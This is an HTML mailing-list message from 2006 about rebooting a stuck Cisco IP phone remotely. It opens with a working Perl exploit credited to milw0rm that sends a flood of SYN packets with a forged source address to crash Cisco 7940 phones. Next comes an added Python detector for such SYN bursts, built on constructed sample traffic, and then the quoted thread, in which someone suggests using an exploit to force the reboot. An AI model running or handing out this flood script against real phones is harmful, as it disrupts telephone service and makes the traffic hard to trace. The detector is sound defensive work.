<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<META content="MSHTML 6.00.2900.2802" name=GENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=#ffffff>
<DIV><PRE>#!/usr/bin/perl
# This is made for trashing cisco 7940 ip phones. kokanin made/discovered this.
# A packetcount of 1000 and a packetdelay of 0.002 sent to port 80 makes my
# phone reboot - play with the settings and stuff. PRIVATE PRIVATE PRIVATE!!!
# not private anymore. Vulnerable phones are running ver. 7.0(2.0) using the skinny
# protocol - this is not for the SIP firmware.
use Net::RawIP;
use Time::HiRes;
$pkt = new Net::RawIP;
die "Usage $0 <src> <dst> <target port> <number of pkts> <packet delay>" unless ($ARGV[4]);
$pkt->set({
ip => {
saddr => $ARGV[0],
daddr => $ARGV[1]
},
tcp=> { dest => $ARGV[2],
syn => 1,
seq => 0,
ack => 0}
});
for(1..$ARGV[3]){ $pkt->set({tcp=>{source=>int(rand(65535))}});Time::HiRes::sleep($ARGV[4]); $pkt->send; };
# milw0rm.com [2006-01-10]
</PRE></DIV>
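<DIV>For the defender's side of the script above, an added example (not part of the original post or thread): a detector that flags a burst of bare TCP SYNs to one phone port, keyed on the destination because the script takes its source address from the command line. The record format, the window and the threshold are assumptions, and the sample packets are constructed.</DIV>
<PRE>
```python
from collections import defaultdict, deque

WINDOW_S = 1.0       # assumed sliding window, seconds
SYN_THRESHOLD = 200  # assumed alert threshold: bare SYNs per window per target


def detect_syn_bursts(packets, window=WINDOW_S, threshold=SYN_THRESHOLD):
    """Alert once per (dst, dport) that receives at least `threshold` bare SYNs
    inside `window` seconds. `packets` are dicts sorted by ts (hypothetical
    record format). Keyed on the destination: the script's source address is
    a command-line argument, so it says nothing reliable about the sender."""
    recent = defaultdict(deque)  # (dst, dport) -> (ts, sport, seq) in window
    alerts = {}
    for p in packets:
        if p["flags"] != "S":  # SYN set, ACK clear
            continue
        key = (p["dst"], p["dport"])
        q = recent[key]
        q.append((p["ts"], p["sport"], p["seq"]))
        while p["ts"] - q[0][0] > window:
            q.popleft()
        if len(q) >= threshold and key not in alerts:
            alerts[key] = {
                "first_seen": q[0][0],
                "syn_count": len(q),
                "distinct_sports": len({sport for _, sport, _ in q}),
                "zero_seq": sum(1 for _, _, seq in q if seq == 0),
            }
    return alerts


def constructed_sample():
    """Constructed records: light web access to one phone, a burst to another."""
    pkts = []
    for i in range(5):  # an admin opening the phone's web page now and then
        pkts.append(dict(ts=i * 2.0, src="10.0.0.5", dst="10.0.1.20",
                         sport=50000 + i, dport=80, flags="S", seq=1000 + i))
    # Shaped like the script's traffic with the settings its comment mentions:
    # 1000 SYNs, 0.002 s apart, port 80, seq 0, a new source port every packet.
    for i in range(1000):
        pkts.append(dict(ts=20.0 + i * 0.002, src="10.0.0.99", dst="10.0.1.21",
                         sport=1024 + i * 37, dport=80, flags="S", seq=0))
    return sorted(pkts, key=lambda p: p["ts"])


if __name__ == "__main__":
    for target, info in detect_syn_bursts(constructed_sample()).items():
        print(target, info)
```
</PRE>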
<BLOCKQUOTE
style="PADDING-RIGHT: 0px; PADDING-LEFT: 5px; MARGIN-LEFT: 5px; BORDER-LEFT: #000000 2px solid; MARGIN-RIGHT: 0px">
<DIV style="FONT: 10pt arial">----- Original Message ----- </DIV>
<DIV
style="BACKGROUND: #e4e4e4; FONT: 10pt arial; font-color: black"><B>From:</B>
<A title=lelio@uoguelph.ca href="mailto:lelio@uoguelph.ca">Lelio Fulgenzi</A>
</DIV>
<DIV style="FONT: 10pt arial"><B>To:</B> <A title=kthorngr@cisco.com
href="mailto:kthorngr@cisco.com">Kevin Thorngren</A> ; <A
title=Hans-Peter.Walter@tds.de
href="mailto:Hans-Peter.Walter@tds.de">Hans-Peter Walter</A> </DIV>
<DIV style="FONT: 10pt arial"><B>Cc:</B> <A title=cisco-voip@puck.nether.net
href="mailto:cisco-voip@puck.nether.net">cisco-voip@puck.nether.net</A> </DIV>
<DIV style="FONT: 10pt arial"><B>Sent:</B> Friday, February 17, 2006 7:53
PM</DIV>
<DIV style="FONT: 10pt arial"><B>Subject:</B> Re: [cisco-voip] Remotely
rebooting Phone without using Callmanager(in CM not connected, but can still
ping/http)</DIV>
<DIV><BR></DIV>
<DIV><FONT face=Arial size=2>aren't there a few exploits out there that cause
a phone to reboot? ;)</FONT></DIV>
<DIV> </DIV>
<BLOCKQUOTE
style="PADDING-RIGHT: 0px; PADDING-LEFT: 5px; MARGIN-LEFT: 5px; BORDER-LEFT: #000000 2px solid; MARGIN-RIGHT: 0px">
<DIV style="FONT: 10pt arial">----- Original Message ----- </DIV>
<DIV
style="BACKGROUND: #e4e4e4; FONT: 10pt arial; font-color: black"><B>From:</B>
<A title=kthorngr@cisco.com href="mailto:kthorngr@cisco.com">Kevin
Thorngren</A> </DIV>
<DIV style="FONT: 10pt arial"><B>To:</B> <A title=Hans-Peter.Walter@tds.de
href="mailto:Hans-Peter.Walter@tds.de">Hans-Peter Walter</A> </DIV>
<DIV style="FONT: 10pt arial"><B>Cc:</B> <A title=cisco-voip@puck.nether.net
href="mailto:cisco-voip@puck.nether.net">cisco-voip@puck.nether.net</A>
</DIV>
<DIV style="FONT: 10pt arial"><B>Sent:</B> Friday, February 17, 2006 7:46
PM</DIV>
<DIV style="FONT: 10pt arial"><B>Subject:</B> Re: [cisco-voip] Remotely
rebooting Phone without using Callmanager(in CM not connected, but can still
ping/http)</DIV>
<DIV><BR></DIV>Not sure of any other ideas at this point. Just curious if
there is any Skinny traffic from the phone to CCM. Use Network Monitor on
the Primary CCM to see if the phone is attempting to create a TCP connection
to the CCM server and if it is failing.<BR><BR>Kevin<BR>On Feb 17, 2006, at
7:38 PM, Hans-Peter Walter wrote:<BR><BR>
<BLOCKQUOTE><BR>hi,<BR>we have a problem with an SRST-config at a remote site, so I played around and set a
line of a phone to "Auto Answer with speakerphone" and could hear some servers running in the background,
and did some testing. The SRST still doesn't work properly, but that's another story...<BR><BR>Now the
phone is somehow stuck. I can ping it, I can go to the phone website http://<phone-ip>, but it
is *NOT* registered in Callmanager and not on the SRST-Router.<BR>I denied access for that phone to the callmanager
(hoped it would try to reboot) ==> no success<BR>I rebooted the SRST-Router (default-gateway of the phone)
==> no success<BR>I shut down and enabled the switch-port where the phone is connected ==> no success<BR>I even
rebooted the entire switch ;-) ==> no success<BR>After all these actions I can still ping / http to the phone...<BR><BR>I wish
I had PoE there, because I think I would just need to unplug power....<BR>soooo: Is there another way to reboot
a phone *without* the Callmanager,<BR>maybe something hidden like http://<phone-ip>/admin or something?
<BR><BR>thanks and a nice weekend...<BR>HP<BR>_______________________________________________<BR>cisco-voip
mailing
list<BR>cisco-voip@puck.nether.net<BR>https://puck.nether.net/mailman/listinfo/cisco-voip<BR></BLOCKQUOTE>
</BLOCKQUOTE>
</BLOCKQUOTE></BODY></HTML>